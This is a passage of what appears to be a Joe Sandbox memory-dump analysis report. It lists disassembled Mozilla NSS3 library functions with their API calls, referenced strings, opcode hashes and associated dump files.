PK11_DoesMechanism.NSS3(?,00000311), ref: 6CADCFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6CADCFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6CADCFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6CADCFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6CADD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6CADD021

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 661c2b1d04cd2457b2817f2455f8ace4bd2e2fb7253c0f12f4865773fc1eda2f
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 8431B671F5295023EF0D445AED21BDE185A4BA630EF090138F90BE67C0F695AB9F42F9

Function 6CBB0FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6CBB1000

Part of subcall function 6CB69BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA91A48), ref: 6CB69BB3
Part of subcall function 6CB69BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA91A48), ref: 6CB69BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CBB1016

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_Unlock.NSS3(?), ref: 6CBB1021

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CBB1046
PR_Unlock.NSS3(?), ref: 6CBB106B
PR_Lock.NSS3 ref: 6CBB1079
PR_Unlock.NSS3 ref: 6CBB1096
free.MOZGLUE(?), ref: 6CBB10A7
free.MOZGLUE(?), ref: 6CBB10B4
PR_DestroyCondVar.NSS3(?), ref: 6CBB10BF
PR_DestroyCondVar.NSS3(?), ref: 6CBB10CA
PR_DestroyCondVar.NSS3(?), ref: 6CBB10D5
PR_DestroyCondVar.NSS3(?), ref: 6CBB10E0
PR_DestroyLock.NSS3(?), ref: 6CBB10EB
free.MOZGLUE(?), ref: 6CBB1105

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 1cc34b85befa3399241d3ea8e32b7dc718bcaa1296b1ebda1ef380c1db84a203
Instruction ID: b7da70df532e6c6e7364e918a8b621d39e213e0d712bdad5c69d74f5a749c935
Opcode Fuzzy Hash: 1cc34b85befa3399241d3ea8e32b7dc718bcaa1296b1ebda1ef380c1db84a203
Instruction Fuzzy Hash: EA316BB5A00481ABD7019F25ED42A59B775FF0131CB584134E80913F61EB32F9B8EBC2

Function 6CAC5E60 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 348COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAC5ECF
EnterCriticalSection.KERNEL32(?), ref: 6CAC5EE3
PR_Unlock.NSS3(?), ref: 6CAC5F0A
PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6CAC5FB5

Strings

NSS_USE_DECODED_CKA_EC_POINT, xrefs: 6CAC61F4

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterFromK11_MakeSectionUnlockValue
String ID: NSS_USE_DECODED_CKA_EC_POINT
API String ID: 2280678669-837408685
Opcode ID: a01bc5016daeeb7ef920014932baa70299dd6841f3e7cb5e0aa40f139b121d2e
Instruction ID: c9731e5295e9426e182daffcb1a24cb693e705a29465774af31b1aa9a47cd2f7
Opcode Fuzzy Hash: a01bc5016daeeb7ef920014932baa70299dd6841f3e7cb5e0aa40f139b121d2e
Instruction Fuzzy Hash: 56F106B4A002158FDB44CF18C984B96BBF4FF09304F5582AAE9089F746D774EA99CF91

Function 6CA2DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6CA2DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CA2DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CA2DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6CA2DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2DECD

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA2DF6D, 6CA2DFCC, 6CA2DFDD
%s at line %d of [%.10s], xrefs: 6CA2DF7C, 6CA2DFEC
database corruption, xrefs: 6CA2DF77, 6CA2DFE7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: a5dee948ef3067521c570b063dda8dca5394a84f5d3108953318647ac9789aca
Instruction ID: 97fcbf7cde5b9575f619fea93d58ffca515e6cac18c78cc20c51a3ec812a714e
Opcode Fuzzy Hash: a5dee948ef3067521c570b063dda8dca5394a84f5d3108953318647ac9789aca
Instruction Fuzzy Hash: 49A11671A046619FC714CF29C480A6AB7F5EF85318F1D892CF8899BB52D738E885CB91

Function 6CAEEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6CAEEE0B

Part of subcall function 6CB00BE0: malloc.MOZGLUE(6CAF8D2D,?,00000000,?), ref: 6CB00BF8
Part of subcall function 6CB00BE0: TlsGetValue.KERNEL32(6CAF8D2D,?,00000000,?), ref: 6CB00C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CAEEEE1

Part of subcall function 6CAE1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CAE1D7E
Part of subcall function 6CAE1D50: EnterCriticalSection.KERNEL32(?), ref: 6CAE1D8E
Part of subcall function 6CAE1D50: PR_Unlock.NSS3(?), ref: 6CAE1DD3

TlsGetValue.KERNEL32 ref: 6CAEEE51
EnterCriticalSection.KERNEL32(?), ref: 6CAEEE65
PR_Unlock.NSS3(?), ref: 6CAEEEA2
free.MOZGLUE(?), ref: 6CAEEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6CAEEED0
PR_Unlock.NSS3(?), ref: 6CAEEF48
free.MOZGLUE(?), ref: 6CAEEF68
PR_SetError.NSS3(00000000,00000000), ref: 6CAEEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6CAEEFA4
free.MOZGLUE(?), ref: 6CAEEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CAEF055
free.MOZGLUE(?), ref: 6CAEF060

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 8c9b1bfa3401786cfc9ba4c0abb1bf0dff2c062908a6397c7a310693c86ed282
Instruction ID: 1562003b190236d4604c1a220d2b774e997f8b8c1310bf7f3b48acf2e5498275
Opcode Fuzzy Hash: 8c9b1bfa3401786cfc9ba4c0abb1bf0dff2c062908a6397c7a310693c86ed282
Instruction Fuzzy Hash: 55815175A00209ABDB00DFA5EC45AEE7BB5BF0C318F194024E919A3711E731E9A4DBE1

Function 6CAB4CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6CAB4D80
PORT_Alloc_Util.NSS3(00000000), ref: 6CAB4D95
PORT_NewArena_Util.NSS3(00000800), ref: 6CAB4DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAB4E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6CAB4E43
PORT_NewArena_Util.NSS3(00000800), ref: 6CAB4E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CAB4E85
DER_Encode_Util.NSS3(?,?,6CC005A4,00000000), ref: 6CAB4EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CAB4F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CAB4F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAB4F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAB4F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAB4F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAB4FC8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 0e6eb11e9ae1131bfa39db85d0560a1fbfe7fe4ea0c8ebc5d68e1b45606e4ad0
Instruction ID: 820cf174c3e6af368e32be4024586fb697b63a40b6b20cef542f999d9bc51e7a
Opcode Fuzzy Hash: 0e6eb11e9ae1131bfa39db85d0560a1fbfe7fe4ea0c8ebc5d68e1b45606e4ad0
Instruction Fuzzy Hash: FE818171A08301AFE701CF24D940B5BB7F8AB84758F18852DF958EB741E771E989CB92

Function 6CAF5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6CAF5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6CAF5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6CAF5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6CAF5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6CAF5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAF5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CAF5E18
TlsGetValue.KERNEL32 ref: 6CAF5E5E
EnterCriticalSection.KERNEL32(?), ref: 6CAF5E72
PR_Unlock.NSS3(?), ref: 6CAF5E8B

Part of subcall function 6CAEF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CAEF854
Part of subcall function 6CAEF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CAEF868
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CAEF882
Part of subcall function 6CAEF820: free.MOZGLUE(04C483FF,?,?), ref: 6CAEF889
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CAEF8A4
Part of subcall function 6CAEF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CAEF8AB
Part of subcall function 6CAEF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CAEF8C9
Part of subcall function 6CAEF820: free.MOZGLUE(280F10EC,?,?), ref: 6CAEF8D0

Strings

d, xrefs: 6CAF5C36
tokens=[0x%x=<%s>], xrefs: 6CAF5D3D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 84607c5120ab7feb7ad4d24ccbb6a2474831133bd887398e526180543a9c63fb
Instruction ID: 0270b4b7be280e0a21a7fb22fdb3fe2430403acd0a8f88980f8c6f589c73f3f4
Opcode Fuzzy Hash: 84607c5120ab7feb7ad4d24ccbb6a2474831133bd887398e526180543a9c63fb
Instruction Fuzzy Hash: A47117F0E051049BEB009F65ED4576E3675AF4530CF188035F82A9AB42EB32E99BC7D2

Function 6CAE8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CAE9582), ref: 6CAE8F5B

Part of subcall function 6CAFBE30: SECOID_FindOID_Util.NSS3(6CAB311B,00000000,?,6CAB311B,?), ref: 6CAFBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6CAE8F6A

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAE8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6CAE8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBCD820,6CAE9576), ref: 6CAE8FF9
DER_GetInteger_Util.NSS3(?), ref: 6CAE901D
PORT_ZAlloc_Util.NSS3(?), ref: 6CAE903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAE9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CAE90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6CAE90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6CAE90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CAE912D
free.MOZGLUE(00000000), ref: 6CAE9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CAE9145

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 253c3c99c0fe655628fae62b0c61d8ed8bbc91ee34ee855ff987288adadfc5d8
Instruction ID: 30a0023a58ec0707d93be211d4931e320c19be3c56eb613444d6174543459f33
Opcode Fuzzy Hash: 253c3c99c0fe655628fae62b0c61d8ed8bbc91ee34ee855ff987288adadfc5d8
Instruction Fuzzy Hash: 8351C3B1A043409BEB00CF28DD81B9B77E8AF98318F094529E954D7741E731E989CBD3

Function 6CA9AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CA9AF47

Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690AB
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB690C9
Part of subcall function 6CB69090: EnterCriticalSection.KERNEL32 ref: 6CB690E5
Part of subcall function 6CB69090: TlsGetValue.KERNEL32 ref: 6CB69116
Part of subcall function 6CB69090: LeaveCriticalSection.KERNEL32 ref: 6CB6913F

FreeLibrary.KERNEL32(?), ref: 6CA9AF6D
free.MOZGLUE(?), ref: 6CA9AFA4
free.MOZGLUE(?), ref: 6CA9AFAA
PR_ExitMonitor.NSS3 ref: 6CA9AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6CA9AFF5
PR_ExitMonitor.NSS3 ref: 6CA9B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA9B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6CA9B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CA9B03C

Strings

%s decr => %d, xrefs: 6CA9AFF0
Unloaded library %s, xrefs: 6CA9B023

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 5db55a4bcaf866444e7567af9ece64415941a2b566868504d0077e786f28b854
Instruction ID: 4e53f672cf125b2c266961e3f696d35067b6ebd4f3f9fdd77e4d38e598d4c5b7
Opcode Fuzzy Hash: 5db55a4bcaf866444e7567af9ece64415941a2b566868504d0077e786f28b854
Instruction Fuzzy Hash: D931E8B5F14110ABEB119F64EC41A59B7F6EB0571CB19412AE80B97E00F733EC98C7A1

Function 6CAE6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAE781D,00000000,6CADBE2C,?,6CAE6B1D,?,?,?,?,00000000,00000000,6CAE781D), ref: 6CAE6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAE781D,?,6CADBE2C,?), ref: 6CAE6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAE781D), ref: 6CAE6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAE6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAE6C96

Part of subcall function 6CA91240: TlsGetValue.KERNEL32(00000040,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91267
Part of subcall function 6CA91240: EnterCriticalSection.KERNEL32(?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA9127C
Part of subcall function 6CA91240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA91291
Part of subcall function 6CA91240: PR_Unlock.NSS3(?,?,?,?,6CA9116C,NSPR_LOG_MODULES), ref: 6CA912A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAE6CAA

Strings

dbm:, xrefs: 6CAE6C3A
extern:, xrefs: 6CAE6C7E
sql:, xrefs: 6CAE6C52
rdb:, xrefs: 6CAE6C69
dbm, xrefs: 6CAE6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6CAE6C91

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 7937e5b90e911672aca0677a1681118199727270410d5ee85936369e797df658
Instruction ID: 2c77024e159e784a1c89e8dbca0cb33ea79bca635c9cd98448f726009cbece30
Opcode Fuzzy Hash: 7937e5b90e911672aca0677a1681118199727270410d5ee85936369e797df658
Instruction Fuzzy Hash: 4501F2B170238123F610277B2C4AF66224C9F895ACF180C31FF14F1B82EBA2E55480E5

Function 6CAF4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6CAB78F8), ref: 6CAF4E6D

Part of subcall function 6CA909E0: TlsGetValue.KERNEL32(00000000,?,?,?,6CA906A2,00000000,?), ref: 6CA909F8
Part of subcall function 6CA909E0: malloc.MOZGLUE(0000001F), ref: 6CA90A18
Part of subcall function 6CA909E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA90A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6CAB78F8), ref: 6CAF4ED9

Part of subcall function 6CAE5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6CAE7703,?,00000000,00000000), ref: 6CAE5942
Part of subcall function 6CAE5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CAE7703), ref: 6CAE5954
Part of subcall function 6CAE5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAE596A
Part of subcall function 6CAE5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAE5984
Part of subcall function 6CAE5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6CAE5999
Part of subcall function 6CAE5920: free.MOZGLUE(00000000), ref: 6CAE59BA
Part of subcall function 6CAE5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6CAE59D3
Part of subcall function 6CAE5920: free.MOZGLUE(00000000), ref: 6CAE59F5
Part of subcall function 6CAE5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6CAE5A0A
Part of subcall function 6CAE5920: free.MOZGLUE(00000000), ref: 6CAE5A2E
Part of subcall function 6CAE5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6CAE5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4EB3

Part of subcall function 6CAF4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAF4EB8,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF484C
Part of subcall function 6CAF4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAF4EB8,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF486D
Part of subcall function 6CAF4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CAF4EB8,?), ref: 6CAF4884

